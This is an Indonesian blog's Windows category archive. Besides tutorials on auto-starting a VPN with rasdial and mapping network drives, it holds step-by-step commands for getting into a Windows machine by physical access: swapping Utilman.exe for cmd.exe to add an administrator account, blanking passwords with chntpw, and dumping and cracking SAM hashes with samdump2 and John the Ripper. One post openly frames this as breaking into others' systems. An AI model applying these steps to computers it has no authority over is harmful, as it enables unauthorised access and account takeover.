Archive for the ‘ Windows ’ Category

Autostart VPN Windows

Pada kali ini saya akan membahas tutorial bagaimana cara membuat VPN Windows supaya otomatis start (Auto Start) pada saat Windows dijalankan (Logon). Untuk membuat windows otomatis logon menggunakan user tertentu silahkan baca di postingan saya terdahulu. Pada tutorial ini saya menggunakan 2 cara, yaitu menggunakan shortcut VPN dan menggunakan bat RASDIAL yang keduanya diletakkan pada startup.

Sebelum membuat koneksi autostart VPN, pastikan anda sudah membuat Koneksi VPN yang sudah bisa dikoneksikan secara manual. Ada beberapa setting yang harus dilakukan pada Koneksi VPN Kita. Klik kanan Nama VPN -> Properties ->Tab Options. Uncheck seperti pada gambar.

VPN Properties Options

1. Menggunakan Shortcut.

  • Buka start menu -> All Programs
  • Cari Folder Startup -> Klik kanan
  • Pilih Open All User

Startup All Program

  • Kemudian akan muncul Windows Explorer baru. Biarkan terbuka.
  • Sekarang buka Control Panel -> View By : Large Icons
  • Pilih Network & Sharing Center
  • Klik Change Adapter Settings
  • Pilih Koneksi VPN yang telah anda buat, kemudian klik kanan dan drag n’ drop pada startup.

Drag n drop

  • Pilih “Create Shortcut Here”
  • Sampai disini kita sudah selesai membuat auto start VPN

Tapi kadang cara tersebut diatas tidak berhasil, saya juga kurang tahu dimana letak kesalahannya. Oleh karena itu kita bisa menggunakan opsi yang kedua, yaitu menggunakan rasdial.

2. Menggunakan Rasdial

Secara manual kita bisa menggunakan rasdial langsung dari command prompt. Dengan cara mengetik:


rasdial "Nama Koneksi VPN" username password

Selanjutnya kita akan membuat rasdial tersebut pada startup, caranya hampir sama dengan cara diatas.

  • Buka folder startup seperti cara diatas.
  • Pada folder ini buatlah file bat dengan nama “vpn_connect.bat” (klik kanan -> new -> text document)
  • Jangan lupa untuk mengganti ekstensi file menjadi “bat”
  • Isi file tersebut dengan kode diatas tadi:

rasdial "Nama Koneksi VPN" username password

  • Simpan file.

Untuk melihat hasil dari tutorial tersebut, silahkan restart komputer.

Terima kasih sudah menyempatkan diri untuk mampir di blog saya 🙂

Advertisements

Download Peta Jakarta [Map of Jakarta] V 2.0

Peta Jakarta

Iseng-iseng ngoprek komputer temen, eh ternyata didalemnya ada peta jakarta yang sangat lengkap. Peta tersebut merupakan aplikasi flash yang sangat kompleks namun mudah digunakan, didalamnya ada fasilitas untuk mencari jalan ataupun tempat. Hanya saja ukurannya lumayan besar, sekitar 120MB sesudah di ekstrak…
Berikut adalah link untuk download aplikasi peta tersebut:
Peta Jakarta Versi 2.0

Reset Password Windows Vista/7 Menggunakan Linux

Pada tutorial kali ini kita dihadapkan dengan permasalahan lupa password Windows atau iseng² berhadiah, ingin menjebol sistem orang lain. Yang perlu disiapkan adalah Linux Backtrack (atau yang lain, yang pasti sudah bisa read/write partisi Windows). Disini kita memanfaatkan fitur Windows yang ada pada halaman login, yaitu Utilman (Utility Manager), yang dapat anda akses dengan cara menekan tombol Win+U. Maka akan muncul Utilman. Fitur inilah yang nantinya akan kita exploit/ganti menjadi command prompt. beginilah ceritanya (kayak dongeng aja.. Kekekeke…).

    • Boot Komputer target menggunakan Backtrack, masuk ke mode GUI (dapat juga dengan mode text, yang penting anda tahu letak partisi Windows target)
    • Masuk ke direktori C:\Windows\System32\ (pada komputer saya terdapat di/mnt/hda1/WINDOWS/System32) dengan mengetik :
cd /mnt/hda/WINDOWS/System32 # Masuk ke direktori System Windows
mv Utilman.exe mv Utilman_old.exe # Rename Utility Manager
cp cmd.exe Utilman.exe # Copy file Command Prompt menjadi Utility Manager
    • Setelah selesai, booting komputer ke Windows.
    • Setelah masuk Windows (halaman login), Pencet tombol Win+U, maka akan muncul halaman Command Prompt.
    • Perhatikan, Command Prompt yang anda dapatkan adalah sebagai administrator. Dari sinilah anda dapat melakukan segalanya.
    • Untuk menambahkan user dengan hak akses setara admin lakukan langkah berikut :
C:\>net user nama_user password /add
    • Contoh : saya akan menambahkan user f1dz dengan password majezty :
C:\>net user f1dz majezty /add
    • Untuk mengubah  menjadi group administrator, ketik :
C:\>net localgroup administrators f1dz /add
    • Sekarang kita sudah mempunyai account dengan hak akses setara admin, silahkan login menggunakan user tersebut.
    • Jika untuk me-reset password administrator, ketik :
C:\>net user administrator *
  • Cara tersebut juga dapat digunakan untuk me-reset password user lain, ganti “administrator” dengan user yang akan diganti passwordnya.

Semoga bermanfaat..
Terima kasih kepada offensive-security team atas inspirasinya.

Reset Password Windows Menggunakan chntpw di Backtrack

Ada sangat banyak cara untuk me-reset password Windows, salah satunya adalah langkah berikut. Langkah tersebut untuk mereset atau menghilangkan password pada WIndows XP. Langsung saja, Boot Backtrack anda (Bisa pake Live USB atau Live CD). Masuk ke konsole. Kita akan menggunakan tool chntpw yang terletak di /pentest/password/chntpw. Sedangkan letak password Windows di [mount point]/WINDOWS/system32/config/SAM.
Pada contoh dibawah kita akan mereset password Administrator dan “Mount point”dimisalkan terletak “/mnt/sda1”.
Lanjutkan…! Setelah buka konsole, ketik :

cd /pentest/password/
chntpw -u Administrator /mnt/sda1/Windows/System32/config/SAM

<Output dari perintah tersebut adalah>

—- User Edit Menu:
1 – Clear (blank) user password
2 – Edit (set new) user password (careful with this on XP or Vista)
3 – Promote user (make user an administrator)
4 – Unlock and enable user account [probably locked now]
q – Quit editing user, back to user select

Select: [q] > [Ketik 1]

Password cleared!

Hives that have changed:
# Name
0 </mnt/sda1/Windows/System32/config/SAM>
Write hive files? (y/n) [n] : [Ketik y]
0 </mnt/sda1/Windows/System32/config/SAM> – OK
Selesai……..

Cracking Password Windows 7

Ini merupakan posting saya yang pertama yang membahas tentang cracking. Walaupun sebenarnya saya sudah lumayan banyak posting tentang cracking pssword di blog lama saya. Pada saat cracking ini saya menggunakan Backtrack 5 yang baru saja rilis, yang tentu saja sudah disertai dengan paket-paket powerfull yang digunakan untuk cracking dan hacking.

Disini saya menggunakan 3 buah software/aplikasi, yang semua nya berjalan pada shell/CLI. Yaitu bkhive, samdump2 dan John The Ripper (tentu saja semua aplikasi ini sudah tersedia di dalam distro BT5). Jika anda menggunakan linux selain BT5, silahkan anda instal terlebih dulu ke tiga aplikasi tersebut. BT5 yang saya gunakan adalah Live USB. Sehingga tinggal colok di komputer target dan booting via USB, dan masuk ke Bt5. Okey langsung saja.

Saya anggap anda sudah punya Backtrack 5 atau Linux distro lain yang sudah diinstall dengan bkhive, samdump2 dan John The Ripper.

Langkah awal yang harus anda lakukan adalah booting Komputer ke Backtrack. Dan masuk ke Backtrack. Sampai muncul :

root@root: ~#

Kemudian ketik :

root@root: ~# startx

Setelah itu akan muncul Desktop Backtrack 5. Setelah muncul jendela desktop, buka Shell dan lakukan mount terhadap hardisk drive C, dimana Windows 7 di install. Cara mount.

root@root: ~# mkdir /media/disk
root@root: ~# mount /dev/sda1 /media/disk

sda1 adalah hardisk (drive C:\) dimana Windows 7 terinstall, sesuaikan dengan Komputer anda. Kemudian ketik:

root@root: ~# bkhive /media/disk/Windows/System32/config/SYSTEM SAM
root@root: ~# samdump2 /media/disk/Windows/System32/config/SAM SAM
root@root: ~# samdump2 /media/disk/Windows/System32/config/SAM SAM > hash.txt

File Hash password sudah dibuat, sekarang masuk ke direktori John The Ripper untuk melakukan cracking password.

root@root: ~# cd /pentest/passwords/john/
root@root: /pentest/passwords/john# john --users=Ofidz --format=NT -i=alnum /root/hash.txt
Cracking Password Win7

Cracking Password Win7

Harusnya hasil cracking seperti pada gambar diatas. Pada gambar diatas saya hanya melakukan cracking password pada satu user (Ofidz). Dan menggunakan charset alpha numeric (-i=alnum) untuk mempercepat cracking. Jika password yang akan di crack susah atau mengandung karakter selain alnum, sebaiknya parameter ini jangan dipakai. Hanya dibutuhkan waktu 56 detik untuk memecahkan password user Ofidz.

Cracking Password Win7 Tanpa Parameter Charset

Cracking Password Win7 Tanpa Parameter Charset

Tanpa charset alnum:

root@root: /pentest/passwords/john# john --users=Ofidz --format=NT /root/hash.txt

Jika tidak menggunakan parameter Charset, waktu yang dibutuhkan lebih lama lagi, yaitu 13:40. Semakin rumit dan panjang password yang di cracking, maka akan semakin lama proses cracking ini berlangsung. RAM dan Prosessor komputer juga berpengaruh pada kecepatan cracking.

Map Drive Menggunakan Command Prompt

Sekedar sharing trik atau info aja. Untuk mempermudah akses drive atau folder/direktori dari komputer lain, biasanya kita menggunakan Map Drive. Map Drive sangat mudah dilakukan pada Windows Explorer. Tapi mungkin karena suatu sebab kita tidak bisa menggunakan Windows Explorer, misal kita ingin melakukan Map Drive tapi berada pada session Telnet. Sehingga kita tidak bisa mengakses GUI. Maka satu-satunya cara adalah dengan menggunakan command.

Command yang digunakan sangat sederhana sekali :

net use x: \\IP_KOMPUTER\folder_sharing

atau jika membutuhkan atentikasi :

net use x: \\IP_KOMPUTER\folder_sharing /user:username passwd_user

Contoh :

net use x: \\10.10.10.2\musik
net use x: \\SERVER\musik
net use x: \\10.10.10.2\musik /user:administrator m0c0p4t
net use x: \\10.10.10.2\e$
net use x: \\10.10.10.2\e$ /user:administrator m0c0p4t
Keterangan :
x: : Adalah nama Drive yang akan digunakan untuk Mapping
e$ : Jika anda ingin mengakses drive E:\ pada komputer yang akan di Map
username : Username komputer yang akan di Map
passwd_user : Password user yang akan di Map

Seharusnya hasilnya seperti gambar berikut :

Cara untuk Disconnect

Contoh diatas adalah cara bagaimana kita membuat Map Drive, sekarang bagaimana cara nya untuk Disconnect ? Sangat simple juga. Jalankan Perintah berikut:

net use x: /delete

Setelah anda meng-eksekusi perintah tersebut, seharusnya Drive x: pada Komputer anda hilang, gambarnya seperti berikut :

Selamat Mencoba !

%d bloggers like this: